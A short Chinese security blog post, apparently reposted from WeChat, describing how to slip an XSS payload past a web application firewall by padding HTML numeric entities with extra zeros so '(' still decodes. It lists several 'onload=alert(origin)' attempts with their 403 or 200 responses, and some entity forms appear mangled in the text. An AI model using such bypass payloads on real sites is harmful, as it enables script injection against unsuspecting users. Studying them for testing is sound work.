![[xss bypass]补0绕过](http://cn-sec.com/wp-content/uploads/2024/12/0-1734333565.jpeg "[xss bypass]补0绕过")
--->目录<---
![[xss bypass]补0绕过](http://cn-sec.com/wp-content/uploads/2024/12/0-1734333565.png "[xss bypass]补0绕过")
![[xss bypass]补0绕过](http://cn-sec.com/wp-content/uploads/2024/12/5-1734333565.png "[xss bypass]补0绕过")
test" onload=alert(origin) --> 403test" onload=print`` --> 403test" onload=alert origin) --> 200
![[xss bypass]补0绕过](http://cn-sec.com/wp-content/uploads/2024/12/5-1734333566.png "[xss bypass]补0绕过")
详情见:http: //www.endmemo.com/unicode/ascii.php
" onload=alert&40origin) value="但这个payload还是返回 403 页面
在&#后面添加额外的零,它会被视为( ,即"("
" onload=alert(origin) value="成功弹窗。
![[xss bypass]补0绕过](http://cn-sec.com/wp-content/uploads/2024/12/5-1734333567.png "[xss bypass]补0绕过")
原文始发于微信公众号(偏远酒馆):[xss bypass]补0绕过
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论